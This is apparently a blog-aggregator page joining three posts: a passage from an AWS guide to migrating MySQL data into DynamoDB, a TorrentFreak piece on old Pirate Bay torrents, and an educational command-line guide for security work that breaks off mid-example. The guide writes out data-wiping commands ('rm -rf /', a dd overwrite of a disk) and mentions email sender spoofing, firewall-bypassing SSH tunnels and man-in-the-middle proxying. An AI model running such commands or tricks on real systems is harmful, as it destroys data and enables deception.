The following sample code assumes that the Hive table for DynamoDB is created with a products column of type ARRAY<STRING>. The productid and quantity columns are aggregated, grouping by customerid and orderid, and inserted into the products column with the CollectUDAF function provided by Brickhouse.

hive> DROP TABLE purchase_ext_s3; 
--- To read data from S3 
hive> CREATE EXTERNAL TABLE purchase_ext_s3 (
customerid string,
orderid    string,
productid  string,
quantity   string) 
ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' 
LOCATION 's3://<your bucket name>/purchase/';

hive> DROP TABLE purchase_ext_dynamodb ; 
--- To connect to the DynamoDB table  
hive> CREATE EXTERNAL TABLE purchase_ext_dynamodb (
      customerid STRING, orderid STRING, products ARRAY<STRING>)
      STORED BY 'org.apache.hadoop.hive.dynamodb.DynamoDBStorageHandler' 
      TBLPROPERTIES ("dynamodb.table.name" = "purchase", 
      "dynamodb.column.mapping" = "customerid:customerid,orderid:orderid,products:products");

--- Batch-puts to DynamoDB using Brickhouse 
hive> add jar /<jar file path>/brickhouse-0.7.1-SNAPSHOT.jar ; 
hive> create temporary function collect as 'brickhouse.udf.collect.CollectUDAF';
hive> INSERT INTO purchase_ext_dynamodb 
select customerid as customerid , orderid as orderid
       ,collect(concat(productid,':' ,quantity)) as products
      from purchase_ext_s3
      group by customerid, orderid; 

Unfortunately, the MAP, LIST, BOOLEAN, and NULL data types are not supported by the DynamoDBStorageHandler class, so the ARRAY<STRING> data type has been chosen. The products column of ARRAY<STRING> data type in Hive is mapped to a StringSet type attribute in DynamoDB. The sample code mostly shows how Brickhouse works, and is intended only for those who want to aggregate multiple records into one StringSet type attribute in DynamoDB.

Python MapReduce with Hadoop Streaming

A mapper task reads each record from the input data on S3, and maps input key-value pairs to intermediate key-value pairs. It divides source data from S3 into two parts (key part and value part) delimited by a TAB character (“\t”). Mapper data is sorted in order by their intermediate key (customerid and orderid) and sent to the reducer. Records are put into DynamoDB in the reducer step.

#!/usr/bin/env python
import sys
 
# get all lines from stdin
for line in sys.stdin:
    line = line.strip()
    cols = line.split(',')
# divide source data into a key part and an attribute part.
# example output: "customer1,order1\tproduct1,10"
    print '%s,%s\t%s,%s' % (cols[0],cols[1],cols[2],cols[3] )

Generally, the reduce task receives the output produced after map processing (which is key/list-of-values pairs) and then performs an operation on the list of values against each key.

In this case, the reducer is written in Python and is based on STDIN/STDOUT/hadoop streaming. The enumeration data type is not available. The reducer receives data sorted and ordered by the intermediate key set in the mapper, customerid and orderid (cols[0],cols[1]) in this case, and stores all attributes for the specific key in the item_data dictionary. The attributes in the item_data dictionary are put, or flushed, into DynamoDB every time a new intermediate key comes from sys.stdin.

#!/usr/bin/env python
import sys
import boto.dynamodb
 
# create connection to DynamoDB
current_keys = None
conn = boto.dynamodb.connect_to_region( '<region>', aws_access_key_id='<access key id>', aws_secret_access_key='<secret access key>')
table = conn.get_table('<dynamodb table name>')
item_data = {}

# input comes from STDIN emitted by Mapper
for line in sys.stdin:
    line = line.strip()
    dickeys, items  = line.split('\t')
    products = items.split(',')
    if current_keys == dickeys:
       item_data[products[0]]=products[1]  
    else:
        if current_keys:
          try:
              mykeys = current_keys.split(',') 
              item = table.new_item(hash_key=mykeys[0],range_key=mykeys[1], attrs=item_data )
              item.put() 
          except Exception ,e:
              print 'Exception occurred! :', e.message,'==> Data:' , mykeys
        item_data = {}
        item_data[products[0]]=products[1]
        current_keys = dickeys

# put last data
if current_keys == dickeys:
   print 'Last one:' , current_keys #, item_data
   try:
       mykeys = dickeys.split(',')
       item = table.new_item(hash_key=mykeys[0] , range_key=mykeys[1], attrs=item_data )
       item.put()
   except Exception ,e:
       print 'Exception occurred! :', e.message, '==> Data:' , mykeys

To run the MapReduce job, connect to the EMR master node and run a Hadoop streaming job. The hadoop-streaming.jar file location or name could be different, depending on your EMR version. Exception messages that occur while the reducers run are stored in the directory assigned by the -output option. Hash key and range key values are also logged to identify which data causes exceptions or errors.

$ hadoop fs -rm -r s3://<bucket name>/<output path>
$ hadoop jar /usr/lib/hadoop-mapreduce/hadoop-streaming.jar \
           -input s3://<bucket name>/<input path> -output s3://<bucket name>/<output path>\
           -file /<local path>/mapper.py -mapper /<local path>/mapper.py \
           -file /<local path>/reducer.py -reducer /<local path>/reducer.py

In my migration experiment using the above scripts, with self-generated test data, I found the following results, including database size and the time taken to complete the migration.

Server
  MySQL instance: m4.2xlarge
  EMR cluster: master 1 x m3.xlarge, core 2 x m4.4xlarge
  DynamoDB: 2,000 write capacity units
Data
  Number of records: 1,000,000,000
  Database file size (.ibd): 100.6 GB
  CSV files size: 37 GB
Performance (time)
  Export to CSV: 6 min 10 sec
  Upload to S3 (sync): 3 min 30 sec
  Import to DynamoDB: depends on write capacity units

 

The following screenshot shows the performance results by write capacity.

Note that the performance result is flexible and can vary depending on the server capacity, network bandwidth, degree of parallelism, conversion logic, program language, and other conditions. All provisioned write capacity units are consumed by the MapReduce job for data import, so the more you increase the size of the EMR cluster and write capacity units of DynamoDB table, the less time it takes to complete. Java-based MapReduce code would be more flexible for function and MapReduce framework.

Step 3: The Lambda function updates DynamoDB by reading data from Amazon Kinesis

In the Lambda console, choose Create a Lambda function and the kinesis-process-record-python blueprint. Next, in the Configure triggers page, select the stream that you just created.

The Lambda function must have an IAM role with permissions to read from Amazon Kinesis and put items into DynamoDB.

The Lambda function can recognize the transaction type of the record by looking up the type attribute. The transaction type determines the method for conversion and update.

For example, when a JSON record is passed to the function, the function looks up the type attribute. It also checks whether an existing item in the DynamoDB table has the same key as the incoming record. If so, the existing item must be retrieved and saved in a dictionary variable (item, in this case). Apply the new update information to the item dictionary before it is put back into the DynamoDB table. This prevents the existing item from being overwritten by the incoming record.

from __future__ import print_function

import base64
import json
import boto3

print('Loading function')
client = boto3.client('dynamodb')

def lambda_handler(event, context):
    #print("Received event: " + json.dumps(event, indent=2))
    for record in event['Records']:
        # Amazon Kinesis data is base64-encoded so decode here
        payload = base64.b64decode(record['kinesis']['data'])
        print("Decoded payload: " + payload)
        data = json.loads(payload)
        
        # user logic for data triggered by WriteRowsEvent
        if data["type"] == "WriteRowsEvent":
            my_table = data["table"]
            my_hashkey = data["row"]["values"]["customerid"]
            my_rangekey = data["row"]["values"]["orderid"]
            my_productid = data["row"]["values"]["productid"]
            my_quantity = str( data["row"]["values"]["quantity"] )
            try:
                response = client.get_item( Key={'customerid':{'S':my_hashkey} , 'orderid':{'S':my_rangekey}} ,TableName = my_table )
                if 'Item' in response:
                    item = response['Item']
                    item[data["row"]["values"]["productid"]] = {"S":my_quantity}
                    result1 = client.put_item(Item = item , TableName = my_table )
                else:
                    item = { 'customerid':{'S':my_hashkey} , 'orderid':{'S':my_rangekey} , my_productid :{"S":my_quantity}  }
                    result2 = client.put_item( Item = item , TableName = my_table )
            except Exception, e:
                print( 'WriteRowsEvent Exception ! :', e.message  , '==> Data:' ,data["row"]["values"]["customerid"]  , data["row"]["values"]["orderid"] )
        
        # user logic for data triggered by UpdateRowsEvent
        if data["type"] == "UpdateRowsEvent":
            my_table = data["table"]
            
        # user logic for data triggered by DeleteRowsEvent    
        if data["type"] == "DeleteRowsEvent":
            my_table = data["table"]
            
            
    return 'Successfully processed {} records.'.format(len(event['Records']))

Step 4:  Switch the application endpoint to DynamoDB

Application code needs to be refactored when you change from MySQL to DynamoDB. The following simple Java code snippets focus on the connection and query parts, because it is difficult to cover all cases for all applications. For more information, see Programming with DynamoDB and the AWS SDKs.

Query to MySQL

The following sample code shows a common way to connect to MySQL and retrieve data.

import java.sql.* ;
...
try {
    Connection conn =  DriverManager.getConnection("jdbc:mysql://<host name>/<database name>" , "<user>" , "<password>");
    stmt = conn.createStatement();
    String sql = "SELECT quantity as quantity FROM purchase WHERE customerid = '<customerid>' and orderid = '<orderid>' and productid = '<productid>'";
    ResultSet rs = stmt.executeQuery(sql);

    while(rs.next()){ 
       int quantity  = rs.getInt("quantity");      //Retrieve by column name 
       System.out.print("quantity: " + quantity);  //Display values 
       }
} catch (SQLException ex) {
    // handle any errors
    System.out.println("SQLException: " + ex.getMessage());}
...
==== Output ====
quantity:1

Query to DynamoDB

To retrieve items from DynamoDB, follow these steps:

  1. Create an instance of the DynamoDB class.
  2. Create an instance of the Table class.
  3. Add the withHashKey and withRangeKeyCondition methods to an instance of the QuerySpec class.
  4. Execute the query method with the querySpec instance created previously. Items are retrieved in JSON format, so use the getJSON method to look up a specific attribute in an item.
...
DynamoDB dynamoDB = new DynamoDB( new AmazonDynamoDBClient(new ProfileCredentialsProvider()));

Table table = dynamoDB.getTable("purchase");

QuerySpec querySpec = new QuerySpec()
        .withHashKey("customerid" , "customer1")  // hashkey name and its value 
        .withRangeKeyCondition(new RangeKeyCondition("orderid").eq("order1") ) ; // Range key and its condition value 

ItemCollection<QueryOutcome> items = table.query(querySpec); 

Iterator<Item> iterator = items.iterator();          
while (iterator.hasNext()) {
Item item = iterator.next();
System.out.println("quantity: " + item.getJSON("product1"));
}
...
==== Output ====
quantity:1

Conclusion

In this post, I introduced two options for seamlessly migrating data from MySQL to DynamoDB and minimizing downtime during the migration. Option #1 used DMS, and option #2 combined EMR, Amazon Kinesis, and Lambda. I also showed you how to convert the key design in accordance with database characteristics to improve read/write performance and reduce costs. Each option has advantages and disadvantages, so the best option depends on your business requirements.

The sample code in this post is not enough for a complete, efficient, and reliable data migration code base to be reused across many different environments. Use it to get started, but design for other variables in your actual migration.

I hope this post helps you plan and implement your migration and minimizes service outages. If you have questions or suggestions, please leave a comment below.

Appendix

To install the Percona Toolkit:

# Install Percona Toolkit

$ wget https://www.percona.com/downloads/percona-toolkit/3.0.2/binary/redhat/6/x86_64/percona-toolkit-3.0.2-1.el6.x86_64.rpm

$ yum install perl-IO-Socket-SSL

$ yum install perl-TermReadKey

$ rpm -Uvh percona-toolkit-3.0.2-1.el6.x86_64.rpm

# run pt-archiver

Example command:

$ pt-archiver --source h=localhost,D=blog,t=purchase --file '/data/export/%Y-%m-%d-%D.%t' --where "1=1" --limit 10000 --commit-each

 


About the Author

Yong Seong Lee is a Cloud Support Engineer for AWS Big Data Services. He is interested in every technology related to data/databases and helping customers who have difficulties in using AWS services. His motto is “Enjoy life, be curious and have maximum experience.”

Pirate Bay’s Oldest Torrents Are ‘Teenagers’ Now

Post Syndicated from Ernesto original https://torrentfreak.com/pirate-bays-oldest-torrents-are-teenagers-now-170326/

The Pirate Bay is one of the most established brands on the Internet, but this certainly wasn’t the case 13 years ago.

The notorious torrent site was originally founded by Swedish pro-culture organization Piratbyrån, during the summer of 2003.

It was first hosted in Mexico, where Gottfrid Svartholm operated the site on a server owned by the company he was working for at the time. After a few months, it moved to Sweden, where Fredrik Neij ran the site and tracker from a Pentium III 1GHz laptop with 256MB of RAM.

While some of the site’s current users weren’t even born at the time, several of the torrents that were uploaded back then are still available today. This week the site’s longest surviving torrents turn thirteen years old. In other words, they’re teenagers now.

Below are the oldest listed torrents as of this week. An episode of “The High Chaparral” has the honor of being the oldest torrent. The file was originally uploaded on March 25, 2004, and although it lists zero seeders in the search results, there are still several people sharing it.

Pirate Bay’s oldest torrents listed

The ‘unofficial’ record hasn’t gone unnoticed by Pirate Bay users. Several commenters refer to the torrent’s achievement as the oldest surviving torrent on the site.

“Well, I guess since this is a part of TPB history i’ll add it to my Raspberry Pi torrent server to seed forever. Hopefully others will do the same,” one person writes in the comment section.

Other torrents that will soon reach teenager status are a copy of the first season of “Oz,” a book with “Top Secret Recipes,” and the “Revolution OS” documentary, which covers the history of Linux, GNU and the free software movement.

What’s most remarkable is that people are still sharing these files after all this time. A torrent only remains available if there’s at least one person sharing it. Over the years millions of torrents have stopped working, but these have weathered all the storms.

To give an idea of how many older torrents are still listed on The Pirate Bay, we looked at one of the site’s most recent database dumps.

Of the 60,000 torrents that were initially available on TPB at the end of 2004, roughly 3,000 are still online today. This number goes up to 10,000 for the 2006 torrents, and 300,000 of all torrents that were uploaded last year are still around.

Given the iconic status of the “High Chaparral” torrent, it’s not unthinkable that this one will live on to become an adult. That is, if The Pirate Bay itself is still operational in 2022.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

The command-line, for cybersec

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/01/the-command-line-for-cybersec.html

On Twitter I made the mistake of asking people about command-line basics for cybersec professionals. I got a lot of useful responses, which I summarize in this long (5k words) post. It’s mostly driven by the tools I use, with a bit of input from the tweets I got in response to my query.

bash

By command-line this document really means bash.

There are many types of command-line shells. Windows has two, ‘cmd.exe’ and ‘PowerShell’. Unix started with the Bourne shell ‘sh’, and there have been many variations of this over the years, ‘csh’, ‘ksh’, ‘zsh’, ‘tcsh’, etc. When GNU rewrote Unix user-mode software independently, they called their shell “Bourne Again Shell” or “bash” (cue “JSON Bourne” shell jokes here).

Bash is the default shell for Linux and macOS. It’s also available on Windows, as part of their special “Windows Subsystem for Linux”. The Windows version of ‘bash’ has become my most used shell.

For Linux IoT devices, BusyBox is the most popular shell. It’s easy to learn, as it includes feature-reduced versions of popular commands.

man

‘Man’ is the command you should not run if you want help for a command.

Man pages are designed to drive away newbies. They are only useful if you are already mostly an expert with the command you desire help on. Man pages list all possible features of a program, but do not highlight examples of the most common features, or the most common way to use the commands.

Take ‘sed’ as an example. It’s used most commonly to do a search-and-replace in files, like so:

$ sed 's/rob/dave/' foo.txt

This usage is so common that many non-geeks know of it. Yet, if you type ‘man sed’ to figure out how to do a search and replace, you’ll get nearly incomprehensible gibberish, and no example of this most common usage.

I point this out because most guides on using the shell recommend ‘man’ pages to get help. This is wrong; it’ll just endlessly frustrate you. Instead, google the commands you need help on, or better yet, search StackExchange for answers.

You might try asking questions, like on Twitter or forum sites, but this requires a strategy. If you ask a basic question, self-important dickholes will respond by telling you to “rtfm” or “read the fucking manual”. A better strategy is to exploit their dickhole nature, such as saying “too bad command xxx cannot do yyy”. Helpful people will gladly explain why you are wrong, carefully explaining how xxx does yyy.

If you must use ‘man’, use the ‘apropos’ command to find the right man page. Sometimes multiple things in the system have the same or similar names, leading you to the wrong page.

apt-get install yum

Using the command-line means accessing that huge open-source ecosystem. Most of the things in this guide do not already exist on the system. You have to either compile them from source, or install them via a package manager. Linux distros ship with a small footprint, but have a massive database of precompiled software “packages” in the cloud somewhere. Use the “package manager” to install the software from the cloud.

On Debian-derived systems (like Ubuntu, Kali, Raspbian), type “apt-get install masscan” to install “masscan” (as an example). Use “apt-cache search scan” to find a bunch of scanners you might want to install.

On RedHat systems, use “yum” instead. On BSD, use the “ports” system, which you can also get working for macOS.

If no pre-compiled package exists for a program, then you’ll have to download the source code and compile it. There’s about an 80% chance this will work easily, following the instructions. There is a 20% chance you’ll experience “dependency hell”, for example, needing to install two mutually incompatible versions of Python.

Bash is a scripting language

Don’t forget that shells are really scripting languages. The bit that executes a single command is just a degenerate use of the scripting language. For example, you can do a traditional for loop like:

$ for i in $(seq 1 9); do echo $i; done

In this way, ‘bash’ is no different than any other scripting language, like Perl, Python, NodeJS, PHP CLI, etc. That’s why a lot of stuff on the system actually exists as short ‘bash’ programs, aka. shell scripts.

Few want to write bash scripts, but you are expected to be able to read them, either to tweak existing scripts on the system, or to read StackExchange help.

File system commands

The macOS “Finder” or Windows “File Explorer” are just graphical shells that help you find files, open, and save them. The first commands you learn are for the same functionality on the command-line: pwd, cd, ls, touch, rm, rmdir, mkdir, chmod, chown, find, ln, mount.

The command “rm -rf /” removes everything starting from the root directory. This will also follow mounted server directories, deleting files on the server. I point this out to give an appreciation of the raw power you have over the system from the command-line, and how easily you can disrupt things.

Of particular interest is the “mount” command. Desktop versions of Linux typically mount USB flash drives automatically, but on servers, you need to do it manually, e.g.:

$ mkdir ~/foobar
$ mount /dev/sdb ~/foobar

You’ll also use the ‘mount’ command to connect to file servers, using the “cifs” package if they are Windows file servers:

# apt-get install cifs-utils
# mkdir /mnt/vids
# mount -t cifs -o username=robert,password=foobar123  //192.168.1.11/videos /mnt/vids

Linux system commands

The next commands you’ll learn are for sysadmin tasks on the Linux system: ps, top, who, history, last, df, du, kill, killall, lsof, lsmod, uname, id, shutdown, and so on.

The first thing hackers do when hacking into a system is run “uname” (to figure out what version of the OS is running) and “id” (to figure out which account they’ve acquired, like “root” or some other user).

The Linux system command I use most is “dmesg” (or ‘tail -f /var/log/dmesg’), which shows you the raw system messages. For example, when I plug in USB drives to a server, I look in ‘dmesg’ to find out which device was added so that I can mount it. I don’t know if this is the best way, it’s just the way I do it (servers don’t automount USB drives like desktops do).

Networking commands

The permanent state of the network (what gets configured on the next bootup) is configured in text files somewhere. But there are a wealth of commands you’ll use to view the current state of networking, make temporary changes, and diagnose problems.

The ‘ifconfig’ command has long been used to view the current TCP/IP configuration and make temporary changes. Learning how TCP/IP works means playing a lot with ‘ifconfig’. Use “ifconfig -a” for even more verbose information.

Use the “route” command to see if you are sending packets to the right router.

Use ‘arp’ command to make sure you can reach the local router.

Use ‘traceroute’ to make sure packets are following the correct route to their destination. You should learn the nifty trick it’s based on (TTLs). You should also play with the TCP, UDP, and ICMP options.

Use ‘ping’ to see if you can reach the target across the Internet. Usefully measures the latency in milliseconds, and congestion (via packet loss). For example, ping NetFlix throughout the day, and notice how the ping latency increases substantially during “prime time” viewing hours.

Use ‘dig’ to make sure DNS resolution is working right. (Some use ‘nslookup’ instead). Dig is useful because it’s the raw universal DNS tool – every time they add some new standard feature to DNS, they add that feature into ‘dig’ as well.

The ‘netstat -tualn’ command views the current TCP/IP connections and which ports are listening. I forget what the various options “tualn” mean, only that it’s the output I always want to see, rather than the raw “netstat” command by itself.

You’ll want to use ‘ethtool -k’ to turn off checksum and segmentation offloading. These are features that break packet-captures sometimes.

There is this new fangled ‘ip’ system for Linux networking, replacing many of the above commands, but as an old timer, I haven’t looked into that.

Some other tools for diagnosing local network issues are ‘tcpdump’, ‘nmap’, and ‘netcat’. These are described in more detail below.

ssh

In general, you’ll remotely log into a system in order to use the command-line. We use ‘ssh’ for that. It uses a protocol similar to SSL in order to encrypt the connection. There are two ways to use ‘ssh’ to login, with a password or with a client-side certificate.

When using SSH with a password, you type something like “ssh username@hostname”. The remote system will then prompt you for a password for that account.

When using client-side certificates, use “ssh-keygen” to generate a key, then either copy the public-key of the client to the server manually, or use “ssh-copy-id” to copy it using the password method above.

How this works is basic application of public-key cryptography. When logging in with a password, you get a copy of the server’s public-key the first time you login, and if it ever changes, you get a nasty warning that somebody may be attempting a man in the middle attack.

$ ssh username@hostname
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!

When using client-side certificates, the server trusts your public-key. This is similar to how client-side certificates work in SSL VPNs.

You can use SSH for things other than logging into a remote shell. You can script ‘ssh’ to run commands remotely on a system in a local shell script. You can use ‘scp’ (SSH copy) to transfer files to and from a remote system. You can do tricks with SSH to create tunnels, which is a popular way to bypass the restrictive rules of your local firewall nazi.

openssl

This is your general cryptography toolkit, doing everything from simple encryption, to public-key certificate signing, to establishing SSL connections.

It is extraordinarily user hostile, with terrible inconsistency among options. You can only figure out how to do things by looking up examples on the net, such as on StackExchange. There are competing SSL libraries with their own command-line tools, like GnuTLS and Mozilla NSS that you might find easier to use.

The fundamental use of the ‘openssl’ tool is to create public-keys, “certificate requests”, and self-signed certificates. All the web-site certificates I’ve ever obtained have been created using the openssl command-line tool to generate CSRs.

You should practice using the ‘openssl’ tool to encrypt files, sign files, and to check signatures.

You can use openssl just like PGP for encrypted emails/messages, but following the “S/MIME” standard rather than PGP standard. You might consider learning the ‘pgp’ command-line tools, or the open-source ‘gpg’ or ‘gpg2’ tools as well.

You should learn how to use the “openssl s_client” feature to establish SSL connections, as well as the “openssl s_server” feature to create an SSL proxy for a server that doesn’t otherwise support SSL.

Learning all the ways of using the ‘openssl’ tool to do useful things will go a long way in teaching somebody about crypto and cybersecurity. I can imagine an entire class consisting of nothing but learning ‘openssl’.

netcat (nc, socat, cryptocat, ncat)

A lot of Internet protocols are based on text. That means you can create a raw TCP connection to the service and interact with it using your keyboard. The classic tool for doing this is known as “netcat”, abbreviated “nc”. For example, connect to Google’s web server at port 80 and type the HTTP HEAD command followed by a blank line (hit [return] twice):

$ nc www.google.com 80
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Tue, 17 Jan 2017 01:53:28 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See https://www.google.com/support/accounts/answer/151657?hl=en for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=95=o7GT1uJCWTPhaPAefs4CcqF7h7Yd7HEqPdAJncZfWfDSnNfliWuSj3XfS5GJXGt67-QJ9nc8xFsydZKufBHLj-K242C3_Vak9Uz1TmtZwT-1zVVBhP8limZI55uXHuPrejAxyTxSCgR6MQ; expires=Wed, 19-Jul-2017 01:53:28 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding

Another classic example is to connect to port 25 on a mail server to send email, spoofing the “MAIL FROM” address.

There are several versions of ‘netcat’ that work over SSL as well. My favorite is ‘ncat’, which comes with ‘nmap’, as it’s actively maintained. In theory, “openssl s_client” should also work this way.

nmap

At some point, you’ll need to port scan. The standard program for this is ‘nmap’, and it’s the best. The classic way of using it is something like:

# nmap -A scanme.nmap.org

The ‘-A’ option means to enable all the interesting features like OS detection, version detection, and basic scripts on the most common ports that a server might have open. It takes a while to run. “scanme.nmap.org” is a good site to practice on.

Nmap is more than just a port scanner. It has a rich scripting system for probing more deeply into a system than just a port, and to gather more information useful for attacks. The scripting system essentially contains some attacks, such as password guessing.

Scanning the Internet, finding services identified by ‘nmap’ scripts, and interacting with them with tools like ‘ncat’ will teach you a lot about how the Internet works.

BTW, if ‘nmap’ is too slow, use ‘masscan’ instead. It’s a lot faster, though it has much more limited functionality.

Packet sniffing with tcpdump and tshark

All Internet traffic consists of packets going between IP addresses. You can capture those packets and view them using “packet sniffers”. The most important packet-sniffer is “Wireshark”, a GUI. For the command-line, there is ‘tcpdump’ and ‘tshark’.

You can run tcpdump on the command-line to watch packets go in/out of the local computer. This performs a quick “decode” of packets as they are captured. It’ll reverse-lookup IP addresses into DNS names, which means its buffers can overflow, dropping new packets while it’s waiting for DNS name responses for previous packets (which can be disabled with -n):

# tcpdump -p -i eth0

A common task is to create a round-robin set of files, saving the last 100 files of 1 gig each. Older files are overwritten. Thus, when an attack happens, you can stop the capture, go backward in time, and view the contents of the network traffic using something like Wireshark:

# tcpdump -p -i eth0 -s65535 -C 1000 -W 100 -w cap

Instead of capturing everything, you’ll often set “BPF” filters to narrow down to traffic from a specific target, or a specific port.

The above examples use the -p option to capture traffic destined to the local computer. Sometimes you may want to look at all traffic going to other machines on the local network. You’ll need to figure out how to tap into wires, or set up “monitor” ports on switches for this to work.

A more advanced command-line program is ‘tshark’. It can apply much more complex filters. It can also be used to extract the values of specific fields and dump them to a text file.

Base64/hexdump/xxd/od

These are some rather trivial commands, but you should know them.

The ‘base64’ command encodes binary data in text. The text can then be passed around, such as in email messages. Base64 encoding is often automatic in the output from programs like openssl and PGP.

In many cases, you’ll need to view a hex dump of some binary data. There are many programs to do this, such as hexdump, xxd, od, and more.

grep

Grep searches for a pattern within a file. More importantly, it searches for a regular expression (regex) in a file. The fu of Unix is that a lot of stuff is stored in text files, and you use grep with regex patterns in order to extract stuff stored in those files.

The power of this tool really depends on your mastery of regexes. You should master enough that you can understand StackExchange posts that explain almost what you want to do, and then tweak them to make them work.

Grep, by default, shows only the matching lines. In many cases, you only want the part that matches. To do that, use the -o option. (This is not available on all versions of grep).

You’ll probably want the better, “extended” regular expressions, so use the -E option.

You’ll often want “case-insensitive” options (matching both upper and lower case), so use the -i option.

For example, to extract all MAC address from a text file, you might do something like the following. This extracts all strings that are twelve hex digits.

$ grep -Eio '[0-9A-F]{12}' foo.txt

Text processing

Grep is just the first of the various “text processing filters”. Other useful ones include ‘sed’, ‘cut’, ‘sort’, and ‘uniq’.

You’ll become an expert at piping the output of one command into the input of the next. You’ll use “sort | uniq” as god (Dennis Ritchie) intended and not the heresy of “sort -u”.

You might want to master ‘awk’. It’s a programming language in its own right, but once you master it, it’ll be easier than other mechanisms.

You’ll end up using ‘wc’ (word-count) a lot. All it does is count the number of lines, words, characters in a file, but you’ll find yourself wanting to do this a lot.

csvkit and jq

You get data in CSV format and JSON format a lot. The tools ‘csvkit’ and ‘jq’ respectively help you deal with those formats: converting the files into other formats, sticking the data in databases, and so forth.

It’ll be easier using these tools that understand these text formats to extract data than trying to write ‘awk’ commands or ‘grep’ regexes.

strings

Most files are binary with a few readable ASCII strings. You use the program ‘strings’ to extract those strings.

This one simple trick sounds stupid, but it’s more powerful than you’d think. For example, I knew that a program probably contained a hard-coded password. I then blindly grabbed all the strings in the program’s binary file and sent them to a password cracker to see if they could decrypt something. And indeed, one of the 100,000 strings in the file worked, thus finding the hard-coded password.

tail -f

So ‘tail’ is just a standard Linux tool for looking at the end of files. If you want to keep checking the end of a live file that’s constantly growing, then use “tail -f”. It’ll sit there waiting for something new to be added to the end of the file, then print it out. I do this a lot, so I thought it’d be worth mentioning.

tar -xvzf, gzip, xz, 7z

In prehistorical times (like the 1980s), Unix was backed up to tape drives. The tar command could be used to combine a bunch of files into a single “archive” to be sent to the tape drive, hence “tape archive” or “tar”.

These days, a lot of stuff you download will be in tar format (ending in .tar). You’ll need to learn how to extract it:

$ tar -xvf something.tar

Nobody knows what the “xvf” options mean anymore, but these letters must be specified in that order. I’m joking here, but only a little: somebody did a survey once and found that virtually nobody knows how to use ‘tar’ other than canned formulas such as this.

Along with combining files into an archive, you also need to compress them. In prehistoric Unix, the “compress” command would be used, which would replace a file with a compressed version ending in ‘.Z’. This was found to be encumbered with patents, so everyone switched to ‘gzip’ instead, which replaces a file with a new one ending with ‘.gz’.

$ ls foo.txt*
foo.txt
$ gzip foo.txt
$ ls foo.txt*
foo.txt.gz

Combined with tar, you get files with either the “.tar.gz” extension, or simply “.tgz”. You can untar and uncompress at the same time:

$ tar -xvzf something.tar.gz

Gzip is always good enough, but nerds gonna nerd and want to compress with slightly better compression programs. They’ll have extensions like “.bz2”, “.7z”, “.xz”, and so on. There are a ton of them. Some of them are supported directly by the ‘tar’ program:

$ tar -xvjf something.tar.bz2

Then there is the “zip/unzip” program, which supports Windows .zip file format. To create compressed archives these days, I don’t bother with tar, but just use the ZIP format. For example, this will recursively descend a directory, adding all files to a ZIP file that can easily be extracted under Windows:

$ zip -r test.zip ./test/

dd

I should include this under the system tools at the top, but it’s interesting for a number of purposes. The usage is simply to copy one file to another, the in-file to the out-file.

$ dd if=foo.txt of=foo2.txt

But that’s not interesting. What’s interesting is using it to write to “devices”. The disk drives in your system also exist as raw devices under the /dev directory.

For example, if you want to create a boot USB drive for your Raspberry Pi:

# dd if=rpi-ubuntu.img of=/dev/sdb

Or, you might want to hard erase an entire hard drive by overwriting random data:

# dd if=/dev/urandom of=/dev/sdc

Or, you might want to image a drive on the system, for later forensics, without stumbling on things like open files.

# dd if=/dev/sda of=/media/Lexar/infected.img

The ‘dd’ program has some additional options, like block size and so forth, that you’ll want to pay attention to.

screen and tmux

You log in remotely and start some long running tool. Unfortunately, if you log out, all the processes you started will be killed. If you want it to keep running, then you need a tool to do this.

I use ‘screen’. Before I start a long running port scan, I run the “screen” command. Then, I type [ctrl-a][ctrl-d] to disconnect from that screen, leaving it running in the background.

Then later, I type “screen -r” to reconnect to it. If there is more than one screen session, using ‘-r’ by itself will list them all. Use “-r pid” to reattach to the proper one. If you can’t, then use “-D pid” or “-D -RR pid” to force the other session to detach from whoever is using it.

Tmux is an alternative to screen that many use. It’s cool for also having lots of terminal screens open at once.

curl and wget

Sometimes you want to download files from websites without opening a browser. The ‘curl’ and ‘wget’ programs do that easily. Wget is the traditional way of doing this, but curl is a bit more flexible. I use curl for everything these days, except mirroring a website, in which case I just do “wget -m website”.

The thing that makes ‘curl’ so powerful is that it’s really designed as a tool for poking and prodding all the various features of HTTP. That it’s also useful for downloading files is a happy coincidence. When playing with a target website, curl will allow you do lots of complex things, which you can then script via bash. For example, hackers often write their cross-site scripting/forgeries in bash scripts using curl.

node/php/python/perl/ruby/lua

As mentioned above, bash is its own programming language. But it’s weird, and annoying. So sometimes you want a real programming language. Here are some useful ones.

Yes, PHP is a language that runs in a web server for creating web pages. But if you know the language well, it’s also a fine command-line language for doing stuff.

Yes, JavaScript is a language that runs in the web browser. But if you know it well, it’s also a great language for doing stuff, especially with the “nodejs” version.

Then there are other good command line languages, like the Python, Ruby, Lua, and the venerable Perl.

What makes all these great is the large library support. Somebody has already written a library that nearly does what you want, and it can be made to work with a little bit of extra code of your own.

My general impression is that Python and NodeJS have the largest libraries likely to have what you want, but you should pick whichever language you like best, whichever makes you most productive. For me, that's NodeJS, because of the great Visual Studio Code IDE/debugger.

iptables, iptables-save

I shouldn't include this in the list. Iptables isn't a command-line tool as such. The real tool is the built-in firewalling/NAT feature set within the Linux kernel; iptables is just the command used to configure it.

Firewalling is an important part of cybersecurity. Everyone should have some experience playing with a Linux system doing basic firewalling tasks: basic rules, NATting, and transparent proxying for mitm attacks.

Use 'iptables-save' (redirecting its output to a file that gets reloaded at boot with 'iptables-restore') to persist your changes.
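
As a rough sketch of those basic tasks, in order: accept SSH, masquerade outbound traffic, redirect web traffic to a local proxy, then save (the interface names, addresses, and save path are just examples; the path follows the Debian/Ubuntu iptables-persistent convention):

# iptables -A INPUT -p tcp --dport 22 -j ACCEPT
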